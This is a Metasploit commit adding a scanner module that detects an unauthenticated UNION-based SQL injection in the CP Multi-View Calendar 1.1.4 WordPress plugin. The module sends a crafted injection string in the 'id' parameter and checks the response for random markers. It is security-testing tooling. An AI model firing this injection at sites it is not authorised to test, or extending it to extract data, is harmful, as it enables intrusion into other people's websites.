Land #5167, WordPress CP Multi-View Calendar SQLI Scanner

2015-04-19 23:36:23 +02:00 · 2015-04-19 23:36:23 +02:00 · ed9175d73f
parent a5583debdc 8c0bcd2e03
commit ed9175d73f
1 changed files with 75 additions and 0 deletions
--- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb
+++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb
@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'CP Multi-View Calendar Unauthenticated SQL Injection Scanner',
+      'Description' => %q{
+        This module will scan given instances for an unauthenticated SQL injection
+        within the CP Multi-View Calendar plugin v1.1.4 for Wordpress.
+      },
+      'Author'       =>
+        [
+          'Joaquin Ramirez Martinez', #discovery
+          'bperry' #metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'EDB', '36243'],
+          [ 'WPVDB', '7910' ]
+        ],
+      'DisclosureDate' => 'Mar 03 2015'))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Target URI of the Wordpress instance', '/'])
+    ], self.class)
+  end
+
+  def run_host(ip)
+    right_marker = Rex::Text.rand_text_alpha(5)
+    left_marker = Rex::Text.rand_text_alpha(5)
+    flag = Rex::Text.rand_text_alpha(5)
+
+    vprint_status("#{peer} - Checking host")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/'),
+      'vars_get' => {
+        'action' => 'data_management',
+        'cpmvc_do_action' => 'mvparse',
+        'f' => 'edit',
+        'id' => "1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"
+      }
+    })
+
+    unless res && res.body
+      vprint_error("#{peer} - Server did not respond in an expected way")
+      return
+    end
+
+    result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
+
+    if result
+      print_good("#{peer} - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress")
+      report_vuln({
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :name  => "Unauthenticated UNION-based SQL injection in CP Multi-View Calendar 1.1.4 for Wordpress",
+        :refs  => self.references.select { |ref| ref.ctx_val == "36243" }
+      })
+    end
+  end
+end